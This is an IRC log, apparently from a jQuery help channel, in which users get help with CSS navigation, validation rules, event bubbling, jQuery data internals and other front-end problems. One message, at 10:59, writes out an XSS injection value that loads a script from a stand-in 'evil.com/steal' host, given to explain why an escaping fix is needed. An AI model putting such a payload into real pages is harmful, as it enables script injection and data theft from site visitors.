[01:09:11] <CssNoob> Why my sliders won't load right away? You need to refresh it one more time to load it all http://rjenterprises.site90.com/
[01:39:06] <Mark____> does anyone know how i can emulate this sticky navigation?
[01:39:08] <Mark____> https://www.abercrombie.com/shop/wd
[01:39:13] <Mark____> it;s so hard.
[01:40:22] <Clorith> Mark____: That's just CSS with position: fixed
[01:40:57] <Clorith> and some transition rules on top for the smooth sliding
[01:42:06] <Mark____> it must require some sort of javascript though right?
[01:42:29] <Mark____> the other one told me it’s jquery.
[01:42:40] <Clorith> The other one ?
[01:42:42] <Mark____> can you be more specific how i can emulate this via css3?
[01:42:48] <Mark____> someone other than you lol
[01:43:17] <Mark____> im having a major headache since yesterday because of this naviation.
[01:43:18] <Clorith> I see, this is compeltely doable using just CSS3 transition attributes and some positioning, no javascript at all
[01:43:42] <Clorith> Just looking at their source I can see that's what they are doing as well
[01:43:58] <Clorith> If you drop by #CSS I'm sure they'll be able to assist with this =)
[01:44:05] <Mark____> you are genius. im not
[01:44:10] <Mark____> i’ll try.. thx
[01:58:51] <Kartagis> http://jsfiddle.net/x3ubh8vs/8/ <---why am I getting undefined is not a function?
[02:02:51] <VectorX> Kartagis take out the space before (e)
[02:03:12] <Kartagis> oh
[02:03:17] <Kartagis> silly me
[02:03:44] <Kartagis> but I can still type non-digit
[02:03:58] <Kartagis> my goal is to prevent that
[02:04:38] <Kartagis> you know how some sites erase the non-digits?
[02:04:43] <Kartagis> VectorX: ^
[03:06:39] <ncls> hi all
[03:08:21] <ncls> I have an input field in a form, and I update its value after an ajax request every second via the .attr('value',value) function. It works well until I submit the form, then the value doesn't update anymore although its ID didn't change
[03:08:48] <ncls> I can't use the .val(value) function because it makes it impossible to edit manually (focus loss)
[03:09:14] <ncls> the idea is to update its value but being able to set a new one manually if needed
[03:11:28] <mattjs5> hi all
[03:11:44] <mattjs5> how can i make the jquery ui autocomplete only have one column?
[03:56:25] <banister> anyone here have experience with select2 ? what does the 'id' field mean here? http://cl.ly/image/0Y341O1V2I3q
[03:58:35] <neredsenvy> Is it possible to select elements that have empty string in them ? I get some td elements with "                " content I need to remove them on button click is it possible to select elements like that ?
[03:58:53] <neredsenvy> td:empty works on most but no on these
[04:10:09] <decx> you cant just remove a td without changing the colspan on its siblings
[04:27:05] <Kartagis> if I set var t=$("#id") but #id is not on the page, would I get an error?
[04:33:43] <decx> no, t would be []
[04:39:33] <Mark____> hmm
[04:39:41] <Mark____> can anyone tell me why this isn’t working? http://lifeto.dothome.co.kr/nav.html
[04:39:51] <Mark____> it worked fine on jsfiddle.
[04:40:48] <decx> <!--%import("http://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js")--> ?
[04:41:47] <Mark____> what do i need to do with it? i forget the code.
[04:41:50] <decx> do this course first Mark____ http://try.jquery.com
[04:41:57] <decx> all the basics
[04:42:31] <Mark____> thanks. i should study all the basics tomorrow while im at school.
[04:42:39] <Mark____> but, can you tell me what the problem is there?
[04:43:17] <Mark____> and did you have to study this page when you were first studying jquery?
[04:43:31] <decx> you dont include jquery and your script isnt in a dom ready
[04:43:49] <decx> this page didnt exists when i first used jquerxy
[04:44:20] * Kartagis holds some 15.000 points on http://try.jquery.com
[04:44:54] <Mark____> speaking of which, i already tried dom ready version, and it did no good to my blur.js
[04:45:13] <Mark____> but one by one, let me fix this first
[04:45:24] <decx> you're not ready to use additional plugins
[04:45:34] <decx> do the course
[04:45:42] <decx> it'll all come together
[04:49:01] <Mark____> and im still getting the same result.
[04:49:02] <Mark____> http://lifeto.dothome.co.kr/nav.html
[04:51:36] <Kartagis> Uncaught SyntaxError: Unexpected token .  for starters
[04:51:55] <Kartagis> http://code.jquery.com/ui/1.10.3/themes/smoothness/jquery-ui.css
[05:47:40] <CoolApps> How do I join the hash symbol and the hex variable in css() as a value?
[05:48:11] <CoolApps> So you know, a string and a variable combined within the value.
[05:50:51] <decx> like you would any other time with js
[05:50:58] <decx> '#'+hex
[06:30:22] <Paradisee> how can i make a carousel from this? http://jsfiddle.net/Paradisee/63r5awm1/1/
[07:06:30] <Mosselmaniac> i'm using jquery validate. I'm doing: rules: { question : {required: true}} which works fine. However, i want to do it something like this: rules: { question[18] : {required: true}}   that 18 is to identify a correct element within an array of elements. this won't work. can anyone help?
[07:08:06] <Mosselmaniac> i get SyntaxError: missing : after property id
[07:11:35] <decx> put it in quotes
[07:11:50] <Mosselmaniac> "18"?
[07:12:03] <decx> 'question[18]'
[07:13:36] <Mosselmaniac> sweet that works
[07:13:39] <Mosselmaniac> now i have another question
[07:14:03] <decx> you can also put data-rule-required="true" in your required element tag
[07:14:05] <Mosselmaniac> to be honest i would like to have a rule that will require all "questions"
[07:14:25] <Mosselmaniac> so all elements (not only [18] but also [19]
[07:14:42] <Mosselmaniac> however, i can't do: rules: { question : {required: true}}  cause that won't work on 18, or 19.
[07:14:59] <decx> <input name="question[whatever]" data-rule-required="true">
[07:15:34] <Mosselmaniac> i thought class='required', but i have a third party module that is preventing me from doing that...
[07:16:40] <Mosselmaniac> decx: that's not working. i would like to have it in some sort of rules: { question : {required: true}} syntax
[07:18:01] <decx> there's a rules method
[07:18:22] <decx> http://jqueryvalidation.org/rules#.22add.22rules
[07:18:43] <Mosselmaniac> not the method, the thing i'm using
[07:19:05] <decx> $('.questions').rules('add', { required: true });
[07:20:54] <Mosselmaniac> i understand sir. but that won't work.
[07:21:23] <decx> either use inline rules, the rules method or repeat it in the rules object
[07:21:25] <Mosselmaniac> i'm currently using rules {...} within my validate.
[07:21:39] <Mosselmaniac> $("#commentForm").validate(rules: {
[07:21:43] <decx> so what
[07:21:49] <decx> you can still add rules afterwards
[07:21:54] <Mosselmaniac> i know.
[07:22:09] <Mosselmaniac> but because of that third party thing this won't work, so i need to get it within this validate
[07:22:20] <decx> doesnt make sense
[07:22:43] <Mosselmaniac> and it works, when i do: 'question[18]', however, the best thing would be if it's applicable to all questions, not just #18.
[07:23:06] <Mosselmaniac> something like 'question[*]' or something. (lol)
[07:23:21] <decx> i gave you 3 ways
[07:23:47] <decx> inline, rules() or repeat it in your rules object
[07:25:34] <Mosselmaniac> my problem is the 2-dimensional array of elements.
[07:42:45] <Kartagis> I defined a function for validation, let's say function a. instead of doing a(field1), a(field2), etc. (there are 45 fields) can I throw them in an array and validate them?
[07:45:54] <Pnoexz> hey, is there a way to send post data without using AJaX or having to build an HTML form?
[07:53:50] <puchacz> hi, what's the recommended way to periodically call a function, with sleep in between?
[07:53:53] <puchacz> I wrote this table-row-for-pdf-management
[07:53:55] <puchacz> sorry
[07:54:11] <puchacz> I wrote this http://jsfiddle.net/Lxvwdc88/
[07:54:17] <puchacz> but I am not happy with recursive call
[07:55:20] <Pnoexz> puchacz: setInterval()
[07:55:39] <puchacz> Pnoexz: which I did - see the fiddle
[07:56:08] <Pnoexz> puchacz: there's a difference between setTimeout() and setInterval()
[07:56:16] <puchacz> ah
[07:56:21] <puchacz> so - is it stack-safe?
[07:56:27] * Pnoexz shrugs
[07:56:43] <puchacz> geez, if I knew it I wouldn't ask
[07:57:09] <Pnoexz> puchacz--
[08:03:25] <puchacz> for what I just read the difference between setTimeout and setInterval is only in scheduling and prioritizing policy
[08:10:17] <benzhninja> Hi
[08:10:46] <benzhninja> Why is the $.html() command taking up so much CPU usage?
[08:11:17] <benzhninja> I am commanding it 4 times every 1000/60 ms and it is taking up 6 - 9% of the CPU
[08:15:36] <Hydro> Heya...
[08:15:57] <Hydro> I'm trying to get the text of a certain part of a href, but it has a <span> and <i> inside it. How can I ignore these?
[08:16:25] <Hydro> <a href="#" class="list-group-item">text I'm trying to extract<span class="badge">59<i class="fa fa-ils fa-sm"></i></span></a>
[08:18:53] <uskerine> hi, why "recipient", "subject" and "print_config" are not submitted in the POST method of this form? http://pastebin.com/Kun6BTN8  -the other fields are-
[08:19:41] <decx> does the text always come first Hydro?
[08:24:47] <benzhninja> anyone?
[08:26:19] <Hydro> decx: yes it does
[08:41:13] <decx> Hydro $('a')[0].firstChild.textContent
[08:41:43] <decx> or this.firstChild.textContent if you get it in a click
[08:43:54] <Hydro> thanks deckx
[08:45:51] <Hydro> I'll give it a shot after dinner ;)
[09:15:55] <uskerine> are type="hidden" inputs included while doing .serialize()?
[09:16:15] <blackkbot> should be
[09:16:20] <blackkbot> idk why they wouldn't
[09:17:17] <uskerine> how can I console.log $(this).serialize() ?
[09:17:50] <tw2113> console.log( $(this).serialize() );
[09:17:53] <blackkbot> lol heh
[09:18:05] <blackkbot> serialize isn't exactly complicated tho
[09:18:08] <blackkbot> [].map.call(form.querySelectorAll('input'),function(e){return e.name+"="+e.value;}).join('&');
[09:18:16] <uskerine> I would saty, they are not
[09:18:29] <uskerine> I would say, they are not included (I mean the hidden fields)
[09:19:57] <blackkbot> well if its an input element and its within the parent it should be... i believe thats how a lot of webpages used to work ... like recaptcha and stuff
[09:22:19] <uskerine> I am trying to isolate the stuff in a jsfiddle
[09:27:32] <Hydro> decx: I'm trying this, but I get errors. $parent = $(this).parent(); $('#itemtitle').text($parent.find('a').firstChild.textContent);
[09:27:40] <Hydro> There's only one a.
[09:27:51] <uskerine> I moved some display stuff from the code AFTER the serialization and it works now
[09:28:53] <Hydro> also, had no idea you can use javascript and jquery in the same line O.o
[09:29:33] <Hydro> nevermind, I thought find returns a single object when it finds only one. Used [0] and solved it. Thanks decx!!
[09:29:34] <blackkbot> jquery is javascript
[09:29:48] <Hydro> yeah but I thought it might cause error when combining the two.
[09:29:52] <tw2113> jquery isn't its own language?
[09:29:55] <blackkbot> it is
[09:30:07] <blackkbot> javascript isn't jquery but jquery is javascript
[09:30:20] <tw2113> jquery is a library of js functions
[09:30:23] <blackkbot> you know like inheritance
[09:30:27] <tw2113> and methods etc
[09:31:00] <blackkbot> someone could say thats what javascript is too :P
[09:31:14] <tw2113> i'm sure some do
[09:32:44] <blackkbot> my biggest problem with jquery is the function names
[09:34:48] <blackkbot> they aren't descriptive enough and given 1 line of code you cannot predict what the code will actually do without the context of the rest of the page but i feel the same way about a lot of libraries and frameworks
[09:47:52] <ThKo> Good evening, does someone see the bug in this fiddle? http://jsfiddle.net/d89120we/ Ironically the app doesn’t append the content to #mini-output-results…Thanks for your hints :) PS: query deliveres the right content.
[09:59:50] <mattjs5> any way to use border-box with jquery ui autocomplete and not have 2 columns?
[10:08:06] <mattjs5> nvm
[10:15:47] <ThKo> mattjs5: Hi, what exactly do you mean? I cannot follow. Have a fiddle? :-)
[10:18:33] <mattjs5> ThKo: ty, I figured that out but have another issue now, but checking into it
[10:18:44] <ThKo> Tell me
[10:23:22] <mattjs5> im having a problem that the autocomplete seems to have a large right padding
[10:23:40] <mattjs5> when i tested it using a simple html template its working fine though
[10:23:51] <mattjs5> so i need to see what about my project is causing the issue
[10:25:21] <torbjorn> how can I bind one click action to a div element and another to an element inside it?
[10:27:00] <ThKo> mattjs5: Do you have a running example?
[10:31:39] <mattjs5> ThKo: i don't have a running example at the problem
[10:31:46] <doug64k> torbjorn: attach a click handler to the div, but in the handler, check the event target to see if it started at the div or started at a child
[10:31:48] <mattjs5> of the problem*
[10:32:24] <doug64k> torbjorn: the child clicks will be handled by the click handler on the div
[10:32:43] <doug64k> because of event propagation
[10:34:19] <torbjorn> how can i check the target, i mean, how do i match it to a selector?
[10:34:21] <litropy> Is (largeString === possiblyDifferentLargeString) the best way of making this comparison?
[10:35:23] <litropy> torbjorn, $("#mytargetID") ?
[10:35:41] <torbjorn> its broader than that
[10:35:44] <doug64k> torbjorn: .is
[10:35:52] <ThKo> torbjorn: http://jsfiddle.net/ffuqdcdz/ Try something like this
[10:36:24] <ThKo> It’s not ready yet, but could be a jump start for you.
[10:37:28] <torbjorn> ThKo: that seems to fire both , thats about where i am at the moment
[10:38:22] <doug64k> torbjorn: http://jsfiddle.net/ffuqdcdz/1/
[10:38:38] <doug64k> ThKo: ^
[10:38:57] <doug64k> I can make it not cheat with ids
[10:40:59] <ThKo> doug64k: Learning never stops..Thanks ;)
[10:41:38] <doug64k> torbjorn ThKo: http://jsfiddle.net/ffuqdcdz/2/
[10:41:59] <ThKo> Great ;)
[10:42:25] <blackkbot> you could just check if the event.target is the right element right?
[10:42:45] <doug64k> blackkbot: thats what that fiddle does
[10:47:09] <ThKo> doug64k: Maybe you’ve an idea for my problem? ;)
[10:47:21] <ThKo> „Good evening, does someone see the bug in this fiddle? http://jsfiddle.net/d89120we/ Ironically the app doesn’t append the content to #mini-output-results…Thanks for your hints  PS: query deliveres the right content. :-) „
[10:47:21] <doug64k> $(function() { ...    is the same thing as $(document).ready(function() { ...
[10:49:21] <doug64k> ThKo: multiple security holes there
[10:49:26] <ThKo> I know
[10:49:27] <ragas> I dont understand the following syntax - function foo{ function bar() { return "stuff" }  return { bar:bar };  }   bar:bar to my naive eyes looks like a property:value pair.  The purpose of this structure is to circumvent the need for the *this* keyword
[10:49:29] <doug64k> let me suggest
[10:49:33] <ThKo> O
[10:49:33] <ThKo> k
[10:53:42] <doug64k> ThKo: http://jsfiddle.net/d89120we/1/
[10:54:32] <ThKo> Oh great, thanks a lot. I’ll try it
[10:59:38] <doug64k> ThKo: so if someone cooked up a way to make the item id be '><script src="//evil.com/steal"></script><div id="q    then the attack wont work
[11:00:08] <ThKo> Ah ok I understand
[11:01:10] <doug64k> it won't work because the .attr call would mangle it into a safe ;&ltscript&gt;... etc
[11:01:35] <doug64k> in my implementation
[11:02:17] <ThKo> Ok
[11:03:53] <ThKo> I’ve to admit that I’ve a lot knowledge gaps about security…It’s horrible
[11:04:43] <guy> am I correct to assume that jQuery is not using dataset when setting data()?
[11:05:30] <doug64k> guy: it is setting a property on an object. it sets a unique number property on the element you set data to, then assigns to a shared "data" object using that number as a key
[11:05:52] <guy> Damn.
[11:06:06] <doug64k> so all the .data calls on the page essentially go into a central object
[11:06:49] <doug64k> however, it peeks at the element to see if it has an appropriate data- attribute if it doesn't find data set in that central object
[11:07:14] <doug64k> so .data works as expected the first time
[11:07:26] <guy> ah! Thats better
[11:07:33] <guy> $('#punch')[0].dataset.foot = 'test' "test" $('#punch').data('foot'); "test"
[11:07:35] <guy> That worked.
[11:07:48] <doug64k> why
[11:08:10] <guy> I am making a plugin thats supposed to work with and without jQuery
[11:08:33] <guy> Is there a way to lookup the central data object knowing the unique ID assined to the element?
[11:08:42] <torbjorn> nice
[11:08:51] <doug64k> guy: jquery does that trick with the unique id to work around memory leaks
[11:08:53] <torbjorn> doug64k: thanks
[11:09:01] <doug64k> guy not sure how relevant that is anymore
[11:09:14] <torbjorn> went with stopPropagation though
[11:09:21] <Kartagis> I defined a function for validation, let's say function a. instead of doing a(field1), a(field2), etc. (there are 45 fields) can I throw them in an array and validate them? EDIT: do I use .apply() for that?
[11:10:45] <doug64k> Kartagis: simplest method is .each
[11:12:03] <doug64k> var valid = true; $('some, selectors, #field2, .lotsofelements').each(function() { if (!a($(this).val()) { valid = false; return false; });
[11:13:21] <guy> $.cache[$.expando]
[11:13:22] <guy> bingo.
[11:13:33] <guy> element's expando
[11:13:46] <doug64k> guy: yeah, that's the thing I was describing
[11:14:01] <guy> Thank you doug64k for getting me on the right path.
[11:14:09] <doug64k> np
[11:18:43] <Kartagis> doug64k: I'v already defined my function. does .each still apply then?
[11:19:33] <doug64k> Kartagis: yes, see in  my example it still calls a for each one
[11:19:55] <doug64k> if (!a(...
[11:20:53] <Kartagis> var valid = true; $('some, selectors, #field2, .lotsofelements').each(function(isNumber) { if (!a($(this).val()) { valid = false; return false; }); ?
[11:21:01] <doug64k> yes
[11:21:09] <doug64k> it's missing a } though
[11:21:26] <doug64k> where did "isNumber" come from
[11:21:31] <doug64k> that is meaningless
[11:21:42] <Kartagis> that is my function
[11:22:07] <doug64k> replace the "a" in "if (!a(..."
[11:22:30] <doug64k> so it's "if (!isNumber(..."
[11:23:10] <Kartagis> or is it like var valid = true; $('some, selectors, #field2, .lotsofelements').each(function() { if (!isNumber($(this).val()) { valid = false; return false; }}); ?
[11:23:17] <Kartagis> so*
[11:31:58] <doug64k> Kartagis: http://jsfiddle.net/dx1wrmrv/
[11:32:49] <guy> I am confused about the $.expando. Dumping $.expando in the console it is "jQuery21106566209320444614", but elements property is "jQuery211065662093204446140.08242968167178333"
[11:33:23] <guy> Where is "0.08242968167178333" coming from?
[11:34:39] <doug64k> Kartagis: tightened up the regex http://jsfiddle.net/dx1wrmrv/1/
[11:36:16] <doug64k> Kartagis: fixed up scientific notation for a laugh http://jsfiddle.net/dx1wrmrv/3/
[11:37:27] <doug64k> guy: namespace?
[11:37:37] <Kartagis> let me study
[11:37:37] <doug64k> there is a concept of namespacing data...
[11:38:15] <guy> doug64k: Where is it picked up from?
[11:38:17] <doug64k> $(x).data('myVariable.myNamespace', data)    <-- lets a plugin isolate its data using the plugin name where I put myNamespace
[11:38:22] <guy> oh.
[11:38:33] <doug64k> you can do that with events too
[11:38:41] <doug64k> .on('click.myNamespace', ...
[11:39:04] <guy> I get it, I just didn't realise that namespacing would assign a separate id.
[11:39:13] <doug64k> works as expected, but later, if you want to wipe out your own handlers, you can do .off('.myNamespace') and it will remove only your handlers
[11:39:17] <doug64k> data has same thing iirc
[11:39:19] <guy> anyway, I found jQuery.data() that does exactly what I needed
[11:39:44] <guy> (takes HTMLElement, data name, even with namespace and returns the value)
[11:58:08] <mattjs5> when using the jquery ui autocomplete how can i use a custom filter if the request.term length is 1 but the default filter for other lengths?
[12:08:19] <mattjs5> nevermind i think i got it
[12:14:47] <DelphiWorld> hello
[12:14:59] <DelphiWorld> it's logical to colorise my banner & footer with blue?
[12:15:36] <systemfault> DelphiWorld: Sure, or you could use a darker color for the footer... like #333
[12:16:02] <systemfault> Perhaps #222
[12:16:04] <DelphiWorld> systemfault: do i realy need to use css for that or i can just use datatheme?
[12:16:12] <Baako> what is illegal about $(#searchterm).keyup(function(){
[12:17:36] <systemfault> DelphiWorld: Never heard of datatheme, sorry.
[12:17:57] <DelphiWorld> systemfault: anyway, am i obligated to use css?
[12:18:32] <systemfault> DelphiWorld: CSS is what's used to style a page
[12:18:49] <DelphiWorld> systemfault: dificult for a *BLIND* :)
[12:19:02] <systemfault> Yeah, I know
[12:24:02] <DelphiWorld> thank systemfault
[12:24:10] <systemfault> :)
[12:32:36] <guy> How do I get a NodeList from jQuery selector?
[12:32:36] <guy> Array.prototype.slice.apply($('p'))
[12:32:38] <guy> ?
[12:32:46] <guy> Thats ~NodeList
[12:34:56] <OnceMe> what it do young coders
[12:35:04] <OnceMe> how can I check if strings starts with $?
[12:35:36] <mukunda_> if str[0] == "$"
[12:35:49] <OnceMe> thank you man
[12:35:56] <OnceMe> when I become a millionaire Ill remember you
[12:35:59] <OnceMe> mukinda_ right
[12:41:04] <BillCriswell> guy: You can use $('.foo').get()
[12:42:03] <guy> Thanks, though as far as I can see that returns an array just the same.
[12:42:04] <doug64k> OnceMe: to check if it starts with something more significant: foo.startsWith('start')
[12:42:08] <guy> It isn't a problem, though
[12:42:50] <doug64k> >> print(('testing is amazing!').startsWith('test'))
[12:43:35] * doug64k glares at b-ot
[12:44:00] <doug64k> js> print(('testing is amazing!').startsWith('test'))
[12:44:06] <b-ot> doug64k: No output.
[12:44:15] <doug64k> ??
[12:45:18] <doug64k> js> print(('testing is amazing!').startsWith('test').toString())
[12:45:21] <b-ot> doug64k: No output.
[12:45:27] <doug64k> ok...
[12:45:27] <MarioD> Hey guys, anybody in here have a second to take a look at a weird event bubbling issue I'm having? http://jsfiddle.net/rzs7x4ab/
[12:47:48] <BillCriswell> guy: Ah, misunderstood.
[12:48:00] <BillCriswell> doug64k: I never heard of startsWtih
[12:48:17] <BillCriswell> Godo to know it exists haha
[12:48:50] <BillCriswell> doug64k: Ah, support for it is pretty bad.
[12:49:09] <doug64k> ah that's why. thanks
[12:49:35] <BillCriswell> You can just use 'startfoobar'.indexOf('start') === 0 as well.
[12:49:56] <doug64k> that's a great way
[12:50:11] <doug64k> on match it's instant
[12:52:35] <MarioD> Event Bubbling Issue: http://jsfiddle.net/rzs7x4ab/1/ Any help in the right direction would be appreciated :)
[12:52:40] <doug64k> MarioD: http://jsfiddle.net/rzs7x4ab/2/
[12:54:24] <MarioD> @doug64k the event still seems to fire 3 times in your example, is there a way to not detect the completion of the 2 children animations?
[12:54:47] <doug64k> MarioD: .one
[12:56:49] <doug64k> MarioD: http://jsfiddle.net/rzs7x4ab/3/
[12:57:44] <MarioD> doug64, thanks for helping out btw - still seems to trigger 2 times
[12:58:01] <doug64k> MarioD: you sure?
[12:58:31] <doug64k> one event writes 2 console messages
[12:59:02] <MarioD> ah kk, let me plug it into my code and wee what happens
[12:59:53] <doug64k> have faith
[13:00:00] <BillCriswell> Hmmm...
[13:00:40] <BillCriswell> Can't connect to websites all of a sudden but am in here just fine.
[13:01:14] <doug64k> BillCriswell: I see your msgs
[13:01:46] <BillCriswell> Hmm, weird.
[13:02:14] <doug64k> BillCriswell: netstat -a
[13:02:42] <doug64k> reasonable number of connections? or massive number in TIME_WAIT
[13:02:52] <BillCriswell> Doesn't appear to be telling me anything.
[13:03:10] <MarioD> doug64k: that seemed to work - thank you! although now I have another weird issue :-P, same context, let me try to get a fiddle up
[13:03:29] <BillCriswell> I'm streaming to netflix on two tvs and they seem fine, but I just can't seem to use a web browser?
[13:04:04] <doug64k> BillCriswell: try speedtest.net - ISP's prioritize the hell out of that to deflect support calls
[13:04:33] <BillCriswell> Won't load either.
[13:05:04] <doug64k> chrome? watched any vimeo? it corrupts chromes memory
[13:05:50] <doug64k> BillCriswell: you tried exiting all browsers and made sure none were still hung in task manager?
[13:06:03] <BillCriswell> doug64k: Whatever it is fixed itself. It wasn't just Chrome though. I opened up safari and firefox to see if it was just Chrome.
[13:06:15] <BillCriswell> So bizarre... probably comcast ruining the internet.
[13:06:44] <doug64k> ya, concast is more like it :)  advertise x, deliver y
[13:07:40] <BillCriswell> lol "concast"
[13:08:48] <doug64k> comcast: "so amazingly wickedly fast, except when it is so slow and horrible that dialup would be faster"
[13:10:39] <frank_o> doug64k: Greetings! I cleaned up that fiddle a bit and added actual expected output: http://jsfiddle.net/frank_o/o4uguntu/49/
[13:10:58] <MarioD> This is getting so confusing, going to have to do a ton of research after I solve this so I actually understand what's going on :-P
[13:11:17] <frank_o> If you have any final thoughts that'd be great. If not I'll probably take it onto StackOverflow
[13:22:00] <DelphiWorld> akkufomk: ok, big change now:P
[13:22:04] <DelphiWorld> akkufomk: see it's colored
[13:22:21] <frank_o> doug64k: sorry i might have mistaken you for someone else
[13:27:27] <MarioD> Updated the fiddle to show visually more what's happening: http://jsfiddle.net/rzs7x4ab/4/
[13:28:24] <MarioD> seems to bug out on second open now
[13:32:34] <DelphiWorld> http://www.alareferadio.tk
[13:32:52] <DelphiWorld> how to make the logo a litle down?
[13:33:04] <MarioD> Delphi, the wordpress logo?
[13:33:23] <DelphiWorld> MarcGuay: yup
[13:33:49] <MarioD> add a margin to the following class: .ui-btn-right{margin-top:20px;}
[13:35:18] <MarioD> or if you mean make it smaller you can do this: .ui-btn-right{height: 70%;}
[13:39:44] <MarioD> Anybody have a second to take a look at http://jsfiddle.net/rzs7x4ab/4/ if you hit open and close a few times you'll see the issue.
[13:49:12] <BloodyScythe> MarioD, you could wait for the action to finish and toggle the open/close afterwards
[13:51:46] <MarioD> BloodyScythe, I try to wait for the css transition to finish, but it seems like something with the stopPropagation is messing up the second time around
[13:56:00] <MarioD> Seems like the issue only happens in Chrome, FF is perfectly fine: http://jsfiddle.net/rzs7x4ab/5/
[13:59:00] <MarioD> Found the answer, looks like Chrome was bugging out because transitionend was not in camel case
[14:02:36] <Doddlin> Hi all, quick question
[14:02:40] <Doddlin> (I hope)
[14:03:41] <Doddlin> If I want to toggle a class on a button to keep it styled as ”clicked”, but if the user changes his mind I want it to toggle off and tollge on the other button he clicked, how would I accomplish this?
[14:03:45] <Doddlin> You get what I mean?
[14:06:32] <Doddlin> anyone?
[14:08:49] <MarioD> Doddlin like this? http://jsfiddle.net/d678otzo/1/
[14:09:24] <Doddlin> MarioD, EXACTLY!!! THANKS! :D :D
[14:09:31] <MarioD> :D
[14:11:09] <Doddlin> so simple, still so hard
[14:13:59] <litropy> Why am I getting "myfunct is not defined" on this? http://jsfiddle.net/bnyva951/3/
[14:14:30] <litropy> (when button is clicked)
[14:22:18] <Baako> is they a jquery method which check if a val is empty?
[14:37:19] <litropy> jQuery's $("").each() function seems to be stripping the .val() function from textarea objects? http://jsfiddle.net/bnyva951/8/
[14:38:42] <BillCris_> litropy: v is an element, not a jquery object.
[14:39:47] <BillCris_> litropy: http://jsfiddle.net/bnyva951/9/
[14:40:24] <litropy> BillCris_, aaaah.
[14:40:28] <litropy> thank you.
[14:41:13] <BillCris_> No problem.
[14:44:33] <Baako> hi guys. i have this http://pastebin.com/u5TfkjL3
[14:44:46] <Baako> but the datalist only shows on blue
[14:44:59] <Baako> but i want it to show whrn the searchterm field
[14:45:03] <Baako> is empty
[14:45:22] <Baako> so as soon as they is nothing in that searchterm input field
[14:45:34] <Baako> i want the datalist to show
[14:45:57] <Baako> is they a jquery function that i can replace blur with which does what i need?
[14:46:40] <BillCris_> Baako: You can use the input event.
[14:46:57] <BillCris_> $('#searchterm').on('input', function () { /* Your Logic */ });
[14:49:13] <Baako> BillCris thanks for your response. but they issue with that was that the datalist does show when the searchterm is empty but it only shows for 1 sec and then disappear again
[14:50:42] <Baako> this is the full code i have
[14:50:43] <Baako> http://pastebin.com/u5TfkjL3
[14:53:38] <BillCris_> Baako: Not sure I'm following right.
[14:54:17] <Baako> BillCris basically i want datalist to show when searchterm is empty
[14:54:31] <Baako> searchterm is an input field
[14:54:38] <Baako> datalist is a div
[14:54:42] <Baako> class
[14:55:52] <BillCris_> Baako: IS datalist using some type of plugin?
[14:56:19] <Baako> nah
[14:56:23] <Baako> nope
[14:56:57] <BillCris_> Why are you hiding it at all then?
[14:58:25] <Baako> BillCris because when searchterm is been used i doesnt want anything in the datalist list to be show
[14:58:29] <Baako> shown
[14:58:48] <Baako> by default datalist get shown first
[14:59:14] <Baako> but once u start typing in searchterm I want datalist to disappear
[14:59:37] <Baako> and only reappear when searchterm is empty
[15:03:10] <BillCris_> Baako: http://jsbin.com/wuvonibeze/1/edit?css,js,output something like this?
[15:07:18] <doug64k> frank_o: http://jsfiddle.net/o4uguntu/50/
[15:08:39] <doug64k> Baako: you can put an attribute on it to disable built-in autocomplete I think
[15:09:01] <doug64k> Baako: autocomplete="off"
[15:09:18] <Baako> BillCris thank you very very much
[15:09:18] <doug64k> on the input element
[15:10:11] <BillCris_> Baako: No problem.
[15:10:19] <doug64k> Baako: nevermind, misinterpreted what you were saying
[15:11:03] <Baako> thats okay
[15:11:19] <frank_o> doug64k: it *is* you!
[15:11:52] <doug64k> ya
[15:12:09] <frank_o> hold on one sec. oh and thank you.. so much.. once again
[15:12:56] * frank_o has `# Code by Doug` written all over his app :-)
[15:13:05] <doug64k> lol
[15:17:48] <frank_o> doug64k: So, I feel I had to add those tests to make sure the p has both text and youtube. If just either one of those it shouldn't touch.
[15:18:07] <frank_o> doug64k: And lo and behold I think we've reached perfection: http://jsfiddle.net/frank_o/o4uguntu/52/
[15:33:14] <frank_o> doug64k: now it's *exactly* like the expected output: http://jsfiddle.net/frank_o/o4uguntu/54/
[15:33:32] <frank_o> `parent.append(resultDiv); parentContainer.css('opacity', '0.2')` basically became `resultDiv.insertAfter(parent); resultDiv.first().find('*').unwrap(); parent.css('opacity', '0.2');`
[15:34:17] <frank_o> doug64k: theres a lot of neat trickery going on here. any chance you could explain it real quick for the comments?
[15:34:55] <doug64k> frank_o: I was going to ask if you had any questions
[15:36:38] <frank_o> doug64k: very little of the original slicing and dicing remains, however i see you've switched to doing a lot of pushing around with nodeTypes.
[15:37:16] <frank_o> doug64k: like "seen" for instance, what does it do?
[15:39:32] <qwertytech> Has anyone worked with UIKit and their upload?
[15:39:53] <qwertytech> I'm trying to figure out how to work with the allComplete
[15:42:00] <doug64k> frank_o: each one thing can contain main .youtube elements, so seen contains a list of all of the .youtube elements that have been processed. this lets it skip any that have already been processed
[15:42:27] <doug64k> can contain many*
[15:43:23] <doug64k> because we broke the "before/after" concept, I treated the content as a stream of elements. any that have a youtube will be included, and any text nodes will become p
[15:43:47] <doug64k> nodeType == 3 means "is text node"
[15:47:13] <frank_o> doug64k: Very nice
[15:47:37] <frank_o> I could probably check for nodeType == 3 then instead of container.clone().children().remove().end().text() as well
[16:36:27] <frank_o> doug64k: taking this baby to the bank now: http://jsfiddle.net/frank_o/o4uguntu/57/
[16:36:33] <frank_o> thanks again man !!
[16:39:49] <doug64k> frank_o: np
[16:43:02] <doug64k> isn't this odd http://coliru.stacked-crooked.com/a/4d5b3ae203b53c7d
[16:43:09] <doug64k> cppreference must be wrong
[16:43:20] <doug64k> oops, wrong chat
[17:12:06] <mattjs5> k
[17:24:45] <frank_o> Which of these two functions are the prettiest? They both do the same:http://jsfiddle.net/frank_o/td8t4gpv/9/
[17:42:03] <BillCriswell> If I needed a function like this I'd reconsider my approach.
[17:58:56] <mattjs5> hi all
[18:00:32] <mattjs5> I'm trying to dynamically filter a <select> list via input type='text', 10k items in dataset (I don't want to use chosen because it doesnt work on mobile, and dont want to use jquery autocomplete because I want a select)
[18:01:08] <mattjs5> im using a method that involves empty()ing the select then appending the filtered items, the problem is that when it emptys a large select list it freezes the page
[18:01:11] <mattjs5> any suggestions?
[18:04:19] <mattjs5> the only thing i can think of is prepend()ing the data then slowly empty()ing the select list in pieces, i think there is a better way
[19:02:18] <doug64k> mattjs5: try making it display: none while manipulating it
[19:02:30] <doug64k> .hide() it
[19:02:42] <doug64k> do the manipulation
[19:02:44] <doug64k> then show it
